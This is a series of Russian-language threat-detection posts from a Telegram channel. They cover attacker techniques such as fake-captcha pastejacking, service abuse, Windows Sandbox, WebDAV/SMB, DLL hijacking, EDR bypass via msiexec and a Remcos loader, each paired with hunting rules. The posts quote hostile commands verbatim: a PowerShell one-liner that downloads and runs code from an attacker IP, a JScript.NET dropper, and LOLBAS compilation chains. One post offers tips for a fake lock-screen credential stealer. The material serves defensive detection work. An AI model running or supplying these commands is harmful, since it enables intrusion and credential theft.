Всем привет! 💻 ✌️
Сегодня рассмотрим технику fake captcha
Да, вам не показалось, суть техники: вам присылают письмо со ссылкой или файл, в котором ссылка. После перехода по ней, появляется окошко - нужно подтвердить, что ты не робот🤖
Капча необычная, есть нюанс - используется техника "
В буфер обмена вставлялся вот такой скрипт:
Для формирования url, считается количество секунд между двумя датами.
🔭 Что делать:
🔤 запретить пользователям Win + R ❌
🔤 отслеживать создание новых ключей в ветке реестра
Для ханта, необходимо собрать значения ключей
#detection@detectioneasy
#ttp@detectioneasy
Сегодня рассмотрим технику fake captcha
Да, вам не показалось, суть техники: вам присылают письмо со ссылкой или файл, в котором ссылка. После перехода по ней, появляется окошко - нужно подтвердить, что ты не робот
Капча необычная, есть нюанс - используется техника "
clipboard hijacking" или "pastejacking" - в буфер обмена добавляется вредоносный скрипт, далее нужно нажать сочетание клавиш Win+R, далее в появившемся окне нажать Ctrl+V , и подтвердить, что вы молодец - Verify 🦣В буфер обмена вставлялся вот такой скрипт:
powershell -w h -c "iex $(irm 138.199.156[.]22:8080/$($z = [datetime]::UtcNow; $y = ([datetime]('01/01/' + '1970')); $x = ($z - $y).TotalSeconds; $w = [math]::Floor($x); $v = $w - ($w % 16); [int64]$v))"Для формирования url, считается количество секунд между двумя датами.
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\
Для ханта, необходимо собрать значения ключей
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\ всех пользователей, и провести анализ. Можно предусмотреть исключения, что-то могли использовать админы #detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10👍5🤔3🍌1
Всем привет 💻 ✌️
Наткнулся на прикольную технику для кражи учетных данных)
Утилита называется Win10CredsThief
Сценарий использования на red team может быть такой: пробили тачку и не получается продвинуться, повыситься, получить хеш и т.п. И тут в дело вступает социалка, Win10CredsThief - это html страница, которая мимикрирует под экран блокировки Windows10. Написано довольно хорошо и пользователь вряд ли что-то заподозрит
Для убедительности лучше проверять какое изображение для блокировки используется в организации, чтобы не вызвать лишних подозрений
🔭 Что делать:
🔤 отслеживать запуск браузера в режиме киоска
#detection@detectioneasy
#ttp@detectioneasy
Наткнулся на прикольную технику для кражи учетных данных)
Утилита называется Win10CredsThief
Сценарий использования на red team может быть такой: пробили тачку и не получается продвинуться, повыситься, получить хеш и т.п. И тут в дело вступает социалка, Win10CredsThief - это html страница, которая мимикрирует под экран блокировки Windows10. Написано довольно хорошо и пользователь вряд ли что-то заподозрит
Для убедительности лучше проверять какое изображение для блокировки используется в организации, чтобы не вызвать лишних подозрений
--kiosk #detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥13👍2🤔2
Всем привет 💻 ✌️
Бывает, что нужно создать службу, но соответствующего файла нет? Злоумышленники используют NSSM (Non-Sucking Service Manager) для закрепления в системе
NSSM - это инструмент, который позволяет запускать любой исполняемый файл как службу.
⚠️ Пример использования:
У хакеров есть вредоносный файл, который не может запускаться как служба, nssm выступает в роли обертки для него
🔭 Что делать:
🔤 отслеживаем создание процесса с параметрами
Можем похантить:
🔤 наличие куста реестра
🔤 наличие логов в журнале Application от провайдера
#detection@detectioneasy
#ttp@detectioneasy
Бывает, что нужно создать службу, но соответствующего файла нет? Злоумышленники используют NSSM (Non-Sucking Service Manager) для закрепления в системе
NSSM - это инструмент, который позволяет запускать любой исполняемый файл как службу.
У хакеров есть вредоносный файл, который не может запускаться как служба, nssm выступает в роли обертки для него
Description = "The non-sucking service manager" or
Product = "NSSM 64-bit"
Можем похантить:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\NSSM, если существует в нем можем посмотреть EventMessageFile - путь к nssm.exe nssm#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegram
Detection is easy
Всем привет! ✌️
ЛК поделись инструментарием Head Mare
mimikatz - дамп кред
ADRecon - сбор информации о домене
secretsdump - дамп кред
ProcDump - дамп процессов
Localtonet - построение тоннелей
revsocks - построение тоннелей
ngrok - построение тоннелей
cloudflared…
ЛК поделись инструментарием Head Mare
mimikatz - дамп кред
ADRecon - сбор информации о домене
secretsdump - дамп кред
ProcDump - дамп процессов
Localtonet - построение тоннелей
revsocks - построение тоннелей
ngrok - построение тоннелей
cloudflared…
👍10🔥6🤔2
Всем привет 💻 ✌️
Продолжим тему с созданием служб сторонними утилитами и рассмотрим сегодня srvany-ng
Создается служба из консоли cmd или powershell:
это уже подозрительное поведение, на которое можно обратить внимание, или подготовить автореспонс на проверку репутации файла (отправку в пески)
Для мониторинга можем использовать следующую информацию о файле:
🔤 Правило корреляции можно сделать на отслеживание цепочки запуска процессов
Скорее всего нужно будет профилировать
🔤 Для хантинга можем поискать следующую информацию в реестре:
Дополнительно в Application могут быть ключи:
⚠️ Можно проверить, что файл службы имеет расширение
#detection@detectioneasy
#ttp@detectioneasy
Продолжим тему с созданием служб сторонними утилитами и рассмотрим сегодня srvany-ng
Создается служба из консоли cmd или powershell:
sc create "MyServiceName" start= auto binPath= "C:\Path\To\srvany-ng.exe"
это уже подозрительное поведение, на которое можно обратить внимание, или подготовить автореспонс на проверку репутации файла (отправку в пески)
Для мониторинга можем использовать следующую информацию о файле:
Description = Run any Windows application as a Service.
Product = srvany-ng
Company = Anthony Birkett
OriginalFileName = srvany-ng.exe
svchost.exe -> *.exe -> *.exe Скорее всего нужно будет профилировать
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\*\Parameters\ ключ Application - путь к файлу который запустит службаДополнительно в Application могут быть ключи:
AppDirectory
AppParameters
AppEnvironment
RestartOnExit
exe и файл в Application - тоже имеет расширение exe#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - birkett/srvany-ng: Run any Windows application as a Service. Drop-in compatible replacement for "srvany.exe" from the…
Run any Windows application as a Service. Drop-in compatible replacement for "srvany.exe" from the W2K3 Resource Kit. - birkett/srvany-ng
🔥8👍5🤔3🍌1
Всем привет 💻 ✌️
Вы заметили, как атакующие начали использовать Windows Sandbox😋 для обхода обнаружения?))
🔤 Хакеры включают функцию Windows Sandbox
🔤 Дропают *.wsb - конфигурационный файл для Windows Sandbox
🔤 В конфиге указывают мапинг локальных папок хоста в виртуальную машину и команду, которую нужно выполнить при старте виртуальной машины
🍴 Похантим:
🔤 Понятно, если у вас не используется Windows Sandbox - ищем любые запуски
🔤 Мониторинг создания
🔤 Проверить ключи реестра
🔤 Можем создавать виртуальную машину без wsb-файла, ищем в аргументах ключевые слова из конфига
Собрал несколько материалов по теме:
🔤 Презентация с Black Hat Asia 2025 Использование Windows Sandbox в целевых атаках
🔤 Презентация с jsac
🔤 Описание текстом
🔤 Документация Microsoft
🔤 Репорт от eset
Номинант, на прикольную технику, как было с шифрованием инфры через IP-камеру
#detection@detectioneasy
#ttp@detectioneasy
Вы заметили, как атакующие начали использовать Windows Sandbox
WindowsSandbox.exe и wsb.exe - можем посмотреть в Prefetch*.wsb - можем проверить в $MFT
HKLM\SOFTWARE\Classes\Applications\WindowsSandbox.exe
HKLM\SOFTWARE\Classes\Windows.Sandbox\shell\open\command
HKLM\SOFTWARE\Microsoft\Windows Sandbox\Capabilities\FileAssociations
wsb.exe start -c "<Configuration>
<Networking>Enable</Networking><MappedFolders><MappedFolder><HostFolder>C:\Users\Public\Downlo
ads</HostFolder><SandboxFolder>C:\Users\WDAGUtilityAccount\Desktop</SandboxFolder><ReadOnly>fa
lse</ReadOnly></MappedFolder></MappedFolders><LogonCommand><Command>C:\Users\WDAGUtilityAccoun
t\Desktop\a.bat</Command></LogonCommand><MemoryInMB>1024</MemoryInMB></Configuration>"
Собрал несколько материалов по теме:
Номинант, на прикольную технику, как было с шифрованием инфры через IP-камеру
#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥12❤7🤔3🍌1
Всем привет 💻 ✌️
Злоумышленники злоупотребляют WebDAV для доставки вредоносов или запуска нагрузки с удаленного сервера.
🔭 Обнаружение:
🔤 Обнаруживаем запуск
🔤 Отслеживаем создание файлов в директории
🔤 Отслеживаем создание процессов
🔤 при старте службы WebClient происходит проверка ее работы через pipe -
Примеры логов
Обзор от any.run
#detection@detectioneasy
#ttp@detectioneasy
Злоумышленники злоупотребляют WebDAV для доставки вредоносов или запуска нагрузки с удаленного сервера.
net.exe или net1.exe с аргументами "\\\\*@SSL\\*", "http*", "\\\\*@*\\*", "*DavWWWRoot*"AppData\Local\Temp\TfsStore\Tfs_DAV\ - можно проверить наличие записей в $MFTrundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookieDAV RPC SERVICE, можем увидеть в событии Sysmon 18, и bof для проверкиПримеры логов
Обзор от any.run
#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
1🔥7👍2🤔2
Всем привет 💻 ✌️
Получают ли Ваши сотрудники файлы SVG?
ЛК представили небольшой обзор злоупотребления SVG.
SVG (Scalable Vector Graphics) формат описания графики в xml, который позволяет встраивать скрипты JS и теги HTML
SVG используются для доставки следующего этапа при использовании техники SVG-Smuggling (poc) или для перенаправления жертвы на следующий ресурс (пример)
🔭 Обнаружение:
🔤 Создание svg-файлов в директориях пользователя
🔤 Детект на основе ADS NTFS
🔤 Мониторить создание процессов у которых в аргументах содержится
#detection@detectioneasy
#ttp@detectioneasy
Получают ли Ваши сотрудники файлы SVG?
ЛК представили небольшой обзор злоупотребления SVG.
SVG (Scalable Vector Graphics) формат описания графики в xml, который позволяет встраивать скрипты JS и теги HTML
SVG используются для доставки следующего этапа при использовании техники SVG-Smuggling (poc) или для перенаправления жертвы на следующий ресурс (пример)
ProviderName="Microsoft-Windows-Sysmon" and EventId = 11 and TargetFilename = "?:\Users\.*\.svg"
ProviderName="Microsoft-Windows-Sysmon" and EventId = 15 and TargetFilename endswith ".svg:Zone.Identifier" and Contents=".*ZoneId=3.*"
".*svg\s.*"#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
securelist.ru
Использование SVG со встроенным HTML в фишинге
Злоумышленники стали чаще рассылать фишинговые письма с SVG-вложениями, содержащими встроенную HTML-страницу или JavaScript-код.
1👍7🔥4🤔2
Всем привет 💻 ✌️
Раннее мы рассмотрели использование WebDAV для доставки вредоносов или запуска нагрузки с удаленного сервера. WebDAV не единственный протокол, которым злоупотребляют злоумышленники, давайте рассмотрим - SMB
Для монтирования сетевой папки, часто используют команду
🔭 Обнаружение:
🔤 Мониторим запуск
🔤 Отслеживаем создание процессов, которые начинаются с
🔤 отслеживаем исходящие сетевые соединения на 445 порт за пределами корпоративной сети
🔤 В журнале
🎯 Для хантинга можем проверить:
🔤 ветку реестра
#ttp@detectioneasy
Раннее мы рассмотрели использование WebDAV для доставки вредоносов или запуска нагрузки с удаленного сервера. WebDAV не единственный протокол, которым злоупотребляют злоумышленники, давайте рассмотрим - SMB
Для монтирования сетевой папки, часто используют команду
net use или в попытке получить хеш пользователя атакуют с помощью ntlm leak
net.exe или net1.exe с аргументами use \\ или буквы тома, которая не используется, например процессы запускались с томов F: и D:, а потом notmalware.exe с тома Q: Microsoft-Windows-SMBClient/Connectivity можем найти, к каким SMB-серверам были подключения, используем для отслеживания новых и ретро по старым событиям🎯 Для хантинга можем проверить:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\ на наличие параметров, начинающихся с ## (экранирование \\) или https, http
#detection@detectioneasy#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegram
Detection is easy
Всем привет 💻✌️
Злоумышленники злоупотребляют WebDAV для доставки вредоносов или запуска нагрузки с удаленного сервера.
🔭 Обнаружение:
🔤 Обнаруживаем запуск net.exe или net1.exe с аргументами "\\\\*@SSL\\*", "http*", "\\\\*@*\\*", "*DavWWWRoot*"
🔤…
Злоумышленники злоупотребляют WebDAV для доставки вредоносов или запуска нагрузки с удаленного сервера.
🔭 Обнаружение:
🔤 Обнаруживаем запуск net.exe или net1.exe с аргументами "\\\\*@SSL\\*", "http*", "\\\\*@*\\*", "*DavWWWRoot*"
🔤…
🔥8👍4🤔2
Всем привет 💻 ✌️
Много обсуждений вызвали репорты Solar 4rays и ЛК об уязвимостях в VipNet, которые связанны с загрузкой вредоносных dll или подменой системных утилит. Аналогичные проблемы присутствуют во многих продуктах.
Для выполнения вредоносного кода из dll, может использоваться несколько техник, которые MITRE объединили в DLL. Она включает:
🔤 DLL Sideloading
🔤 DLL Search Order Hijacking
🔤 DLL Redirection
🔤 Phantom DLL Hijacking
🔤 DLL Substitution
🔭 Обнаружение:
🔤 отслеживаем создание новых dll файлов в директориях, где хранится исполняемый файл, и их загрузку в память процесса
🔤 запуск процесса и загрузка dll (без подписи или с невалидной подписью) из одной директории в профиле пользователя (
🔤 запуск процессов с именами системных утилит, с нестандартной цифровой подписью (отсутствием ее) или из нестандартных путей
🔤 загрузка dll или запуск дочернего процесса, которые ранее не использовались (нужно использовать ретро)
Скорее всего будет очень шумно...
#detection@detectioneasy
#ttp@detectioneasy
Много обсуждений вызвали репорты Solar 4rays и ЛК об уязвимостях в VipNet, которые связанны с загрузкой вредоносных dll или подменой системных утилит. Аналогичные проблемы присутствуют во многих продуктах.
Для выполнения вредоносного кода из dll, может использоваться несколько техник, которые MITRE объединили в DLL. Она включает:
\w:\\\\users\\.*\\.*\.dll$). Можно объединить с предыдущимc:\windows\system32 c:\windows\syswow64 c:\windows\winsxsСкорее всего будет очень шумно...
#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
rt-solar.ru
Бэкдор VipNet: Жуи и Диндин передают привет из 2021 года
🔥7🤔4👍3
Всем привет 💻 ✌️
Недавно обсуждали уязвимости в EDR/VPN, а у EDR SentinelOne, бага by design, которая позволяет остановить службы через обновление продукта.
Как это работает❓
🔤 Как правило, во время обновления или восстановления продукта, службы и процессы EDR останавливаются
🔤 Злоумышленик запускает обновление (восстановление) через msiexec, и в момент когда процессы и службы потушились, хакер убивает процесс msiexec.exe, что приведёт к сбою установки и оставит систему без защиты.
Важные нюансы:
🔤 Уязвимость актуальна, только если вендор не реализовал механизмы самозащиты (блокировка остановки служб, запрет деинсталляции без прав админа и т.д.) или они отключены
🔤 Хакерам не нужно искать оригинальные MSI-файлы — установленные пакеты кешируются в
🔭 Обнаружение:
🔤 Обнаруживаем локальные попытки установки edr/av
🔤 Обнаруживаем попытки использования пакетов из
🔤 Отслеживаем, используемые версии средств защиты
🔤 Отслеживаем запуск msiexec от подозрительных родительских процессов
🔤 В журнале Application отслеживаем события от провайдера
События при нормальной установке пакета
События при удалении пакета
Событие при обновлении конфигурации
События при завершении установки с ошибкой
Эти события интересуют нас больше всего, именно они сгенерировались в момент обновления/восстановления продукта через msiexec
Дополнительно информацию об установленных пакетах можно посмотреть в реестре -
#detection@detectioneasy
#ttp@detectioneasy
Недавно обсуждали уязвимости в EDR/VPN, а у EDR SentinelOne, бага by design, которая позволяет остановить службы через обновление продукта.
Как это работает
Важные нюансы:
%WINDIR%\Installer msiexec /i или восстановления msiexec /fa%WINDIR%\Installer, совпадающих с вашим вендором или установкой по GUID, который можно найти в реестре HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\UninstallMsiInstallerСобытия при нормальной установке пакета
1040 (путь к msi-файлу, и pid процесса, который запустил установку) -> 1042 (путь к msi-файлу, pid процесса, который запустил установку) -> 11707 (установка успешна, можем увидеть имя продукта\производителя)-> 1033 (установка завершена с кодом 0, тут можем увидеть sid-пользователя, название продукта и версию, может быть полезно для заполнения контроля установленных версий)
События при удалении пакета
11724 -> 1034 (продукт удален, тут можем увидеть название продукта и версию)
Событие при обновлении конфигурации
11728 (обновление конфигурации) - генерируется при запуске той же версии msi-пакета
События при завершении установки с ошибкой
1033 (название продукта и версию, с кодом завершения отличным от 0) ->11708 (установка завершена с ошибкой, sid-пользователя, название продукта)
Эти события интересуют нас больше всего, именно они сгенерировались в момент обновления/восстановления продукта через msiexec
Дополнительно информацию об установленных пакетах можно посмотреть в реестре -
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\<SID>\Products\<GUID>\InstallProperties . В этом разделе реестра есть интересный ключ - InstallSource по которому можно похантить аномалии в установке EDR и т.п.#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11👍5🤔3
Всем привет 💻 ✌️
Небольшой гайд, по созданию профиля Volatility для Linux операционных систем. В In-House SOC и MSSP идеально иметь профили под все используемые дистрибутивы и версии ядра, для этого необходимо внедрить процесс взаимодействия с it
#detection@detectioneasy
Небольшой гайд, по созданию профиля Volatility для Linux операционных систем. В In-House SOC и MSSP идеально иметь профили под все используемые дистрибутивы и версии ядра, для этого необходимо внедрить процесс взаимодействия с it
#detection@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
xakep.ru
Уроки форензики. Создаем профиль Volatility для анализа инцидентов в Linux
Инструмент Volatility давно стал стандартом в цифровой криминалистике, но его эффективность напрямую зависит от корректного профиля операционной системы, который выступает «переводчиком» между сырыми данными памяти и понятной человеку информацией. В этой…
🔥10👍7😁4
Всем привет 💻 ✌️
Что происходит, когда админ забыл пароль от локальной учетки? Смотрит laps?)
Или по-старинке заменит
Последний вариант, может стать точкой входа для хакеров. Представим ситуацию, админ за собой не убрался, сервер торчит в интернет (такого не бывает😄 )
Плохие парни нажимают пару раз shift и получают права system👤 на серваке
🔭 Что же нам делать?
🔤 отслеживаем копирование системных файлов
🔤 хантим, чтобы описание файла не отличалось от его имени
🔤 обнаруживаем запуск утилит из специальных возможностей, от родителя
🔤 для профилактики берем хеш cmd.exe с каждого компа (если нет базы) и проверяем файловую систему на совпадения
#detection@detectioneasy
#ttp@detectioneasy
Что происходит, когда админ забыл пароль от локальной учетки? Смотрит laps?)
Или по-старинке заменит
sethc.exe (utilman.exe) на cmd.exe, и создаст нового пользователя?Последний вариант, может стать точкой входа для хакеров. Представим ситуацию, админ за собой не убрался, сервер торчит в интернет (такого не бывает
Плохие парни нажимают пару раз shift и получают права system
sethc.exe, utilman.exe, osk.exe, Magnify.exe, Narrator.exe, DisplaySwitch.exewinlogon.exe и пользователя system#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10👍6🤔2❤1
Всем привет 💻 ✌️
Рассмотрим атаку с безфайловым PowerShell-загрузчиком, который запускает Remcos RAT в память.😈
Что происходит❓
Злоумышленники рассылают фишинговые письма с ZIP-архивами, внутри — поддельные LNK-файлы (часто маскируются под PDF или документы).
При открытии срабатывает цепочка:
🔤 LNK → MSHTA.exe — запускает обфусцированный HTA с удаленного ресурса.
🔤 HTA → PowerShell — vbs-скрипт используется как прокси, для запуска powershell команд: добавление в закреп
🔤 In-Memory Loader — загруженный powershell декодирует base64, выделяет память через
Powershell Loader - может быть и супер крутой, обфусцированный, использует callback, но шаги до его запуска вообще не opsec)
Очень шумно, закреп hta в реестр, запуска hta с удаленного сервера, загрузка файлов через powershell, добавление в исключение defender...) powershell скрипт с base64 и virtualalloc
🔭 Обнаружение:
🔤 MSHTA.exe с http(s) точность близка к 100%
🔤 Закреп скриптов в
🔤 Сетевые подключения от PowerShell (и в целом) на нестандартные порты за пределами корпоративной сети
🔤 Опасные командлеты в powershell
🔤 Добавление исключений в defender (в AV)
Может получиться интересный хант
#detection@detectioneasy
#ttp@detectioneasy
Рассмотрим атаку с безфайловым PowerShell-загрузчиком, который запускает Remcos RAT в память.
Что происходит
Злоумышленники рассылают фишинговые письма с ZIP-архивами, внутри — поддельные LNK-файлы (часто маскируются под PDF или документы).
При открытии срабатывает цепочка:
HKCU:\…\CurrentVersion\Run, загрузки hta, ps1 и decoy-файла в C:\Users\Public, добавление директории C:\Users\Public в исключения Windows Defender (Add-MpPreference -ExclusionPath). В закреп добавлялась powershell-команда для запуска hta_)VirtualAlloc, копирует шеллкод и запускает его через CallWindowProcW, запускается Remcos RATPowershell Loader - может быть и супер крутой, обфусцированный, использует callback, но шаги до его запуска вообще не opsec)
Очень шумно, закреп hta в реестр, запуска hta с удаленного сервера, загрузка файлов через powershell, добавление в исключение defender...) powershell скрипт с base64 и virtualalloc
HKLM\...\Run и HKCU\...\RunVirtualAlloc, CallWindowProcWМожет получиться интересный хант
Мы можем собрать и группировать исключения AV с хостов.
Обращаем внимание на пути, которые повторяются реже всего, если не пробили всю инфру))
Полезно проверять, что в директориях исключений AV лежит_)
#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
Qualys
Fileless Execution: PowerShell Based Shellcode Loader Executes Remcos RAT | Qualys
Cybercriminals are progressively turning PowerShell to launch stealthy attacks that evade traditional antivirus and endpoint defenses. By running code directly in memory, these threats leave minimal…
👍7🔥5🤔2❤1
Интересный доклад на phd о работе планировщика задач и способах сокрытия задач
#detection@detectioneasy
#ttp@detectioneasy
#detection@detectioneasy
#ttp@detectioneasy
phdays.com
Positive Hack Days
Международный фестиваль по кибербезопасности для всех, кто хочет погрузиться в мир кибербеза и круто провести время
🔥15❤3👍3🤔1
Detection is easy
Интересный доклад на phd о работе планировщика задач и способах сокрытия задач #detection@detectioneasy #ttp@detectioneasy
Всем привет 💻 ✌️
Наконец-то досмотрел доклады с phd) Спасибо всем спикерам за проделанную работу и шеринг знаний)
Offense/Defense
🔤 Abuse GPO AD
🔤 Отключение EDR/AV
🔤 Смотрим глубже: ищем подозрительные COM-запросы на уровне ALPC
🔤 Опыт реального перехода на detection as code
🔤 Легитимные С2: как популярные сервисы работают на хакеров
🔤 Sysinternals глазами SOC
🔤 Подходы и техники для детекта «красных» утилит. Взгляд со стороны blue team, или то, как мы видим red team
🔤 Сколько стоит SOC на open source
Больше всего отклинулось внедрение ml/llm в разные области soc/cert🧠
🔤 От данных к действиям: ML в сердце DFIR
🔤 ИИ-агенты в киберразведке
🔤 Применение легковесных LLM в аналитических задачах ИБ
🔤 LLM и агенты: разгоняем SOC
🔤 AutoML threat detection: повышаем уровень автономности SOC
#detection@detectioneasy
#ttp@detectioneasy
Наконец-то досмотрел доклады с phd) Спасибо всем спикерам за проделанную работу и шеринг знаний)
Offense/Defense
Больше всего отклинулось внедрение ml/llm в разные области soc/cert
#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9👍4🍌4👏2
Forwarded from Ever Secure (Aleksey Fedulaev)
Друзья, это свершилось! 😱✨
Честно? Мы сами до конца не верили, что этот день настанет... но она — в печати!
Да-да, наша книга теперь существует в реальном, бумажном формате 📖🔥
Уже завтра мы забираем первую партию, и поверьте, она выглядит круче, чем мы ожидали!
А совсем скоро вы тоже сможете её заказать — предзаказ уже на подходе 👀
Следите за новостями, будет кое-что интересное… Может быть, даже небольшой сюрприз для первых заказов?🤔
👀 @ever_secure
Честно? Мы сами до конца не верили, что этот день настанет... но она — в печати!
Да-да, наша книга теперь существует в реальном, бумажном формате 📖🔥
Уже завтра мы забираем первую партию, и поверьте, она выглядит круче, чем мы ожидали!
А совсем скоро вы тоже сможете её заказать — предзаказ уже на подходе 👀
Следите за новостями, будет кое-что интересное… Может быть, даже небольшой сюрприз для первых заказов?🤔
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
❤9🔥6😁2👍1
Всем привет 💻 ✌️
В отчете Bi.Zone рассмотрена работа двух вредоносных кампаний.
Давайте рассмотрим одну из них
🔤 Атака начинается с фишинга, пользователям присылают ссылку при переходе по которой загружается zip-архив с lnk и ini-файлом. INI по факту является архивом, в котором exe, dll и decoy-pdf. EXE - это легитимный бинарь с подписью, но уязвимый к загрузке dll
🔤 Выполняется команда LNK, которая ищет архив в каталоге пользователя
🔤 Далее проверяется наличие легитимного файла из вложенного архива, он запускается и загружает в память вредоносную библиотеку (С# Loader), для запуска файла используется команда
🔤 Если файла из шага 2 нет, то проверяется наличие
🔤 Для запуска компиляции JScript.NET используется jsc.exe, который в свою очередь запускается с помощью LOLBAS - forfiles. Исполняемый файл сохраняется с именем
Работа загрузчика подробно расписана в репорте, но стоит выделить основные моменты:
🔤 При обращении к серверу используется следующая строка заголовка
🔤 Создается рабочий каталог
🔤 Для закрепления создается
🔤 Для защиты от песочниц следующего этапа, атакующие проверяют систему, и если он не соответствует критериям, то загружается
🔭 Обнаружение
🔤 по классике, отслеживаем создание LNK-файлов
🔤 основным тригером для нас должны стать команды из LNK. набор триггеров и LOLBAS и .Net, касательно этой кампании можем поискать использование
🔤 создание скриптов в директории автозагрузки
Похантить можно:
🔤 user-agent
🔤 наличие скриптов в директории автозагрузке пользователя
🔤 обращение на
#detection@detectioneasy
#ttp@detectioneasy
В отчете Bi.Zone рассмотрена работа двух вредоносных кампаний.
Давайте рассмотрим одну из них
%USERPROFILE%, создает JScript.NET файл. Он распаковывает zip-архив, замаскированный под расширение INIset /p="import System;import System.IO;import System.IO.Compression;import System.Text;import System.Diagnostics;function Main(){var args:String[]=System.Environment.GetCommandLineArgs();Directory.CreateDirectory(args[2]);System.IO.Compression.ZipFile.ExtractToDirectory(args[1], args[2]);System.IO.Compression.ZipFile.ExtractToDirectory(args[2] + "\\" + (Convert.ToChar(117)+Convert.ToChar(109)+Convert.ToChar(46)+Convert.ToChar(105)+Convert.ToChar(110)+Convert.ToChar(105)), args[2]);Process.Start("cmd.exe", "/C move " + System.Reflection.Assembly.GetExecutingAssembly().Location + " " + System.Reflection.Assembly.GetExecutingAssembly().Location + "_");}Main();">%TEMP%\UKSS1G4Q7H6S.astart с применением обфускации^st^art "" /MIN "%USERPROFILE%\J8ZUARAW71W7\H5GDXM70NJ.exe" & exit
unzip.exe (скомпилированный JScript.NET), который распаковывает фальшивый INI-файлif exist %TEMP%\unzip.exe (%TEMP%\unzip.exe "%f" "%USERPROFILE%\J8ZUARAW71W7")
%TEMP%\unzip.exe(C:\Windows\system32\forfiles.exe /P %SystemRoot% /M notepad.exe /C "cmd /c %_jsc% /nologo /r:System.IO.Compression.FileSystem.dll /out:%TEMP%\unzip.exe %TEMP%\UKSS1G4Q7H6S.a")
Работа загрузчика подробно расписана в репорте, но стоит выделить основные моменты:
User-Agent: «Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36%APPDATA%\74EJ6RTFKKRS startapp.bat в каталоге автозагрузки, который запускает %APPDATA%\74EJ6RTFKKRS\H5GDXM70NJ.exe hxxps://huggingface[.]co/TheBloke/Llama-2-70B-GGUF/resolve/main/llama-2-70b.Q5_K_M.gguf forfiles.exe и start.exeПохантить можно:
User-Agent: «Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36hxxps://huggingface[.]co/TheBloke/Llama-2-70B-GGUF/resolve/main/llama-2-70b.Q5_K_M.gguf #detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
BI.ZONE
ВПО или LLM? Silent Werewolf использует новые загрузчики в атаках на российские и молдавские организации
Злоумышленники ограничивают возможность получать вредоносную нагрузку. Это делает ВПО менее отслеживаемым, а также усложняет для исследователей изучение самой группировки
🔥8👍3🤔2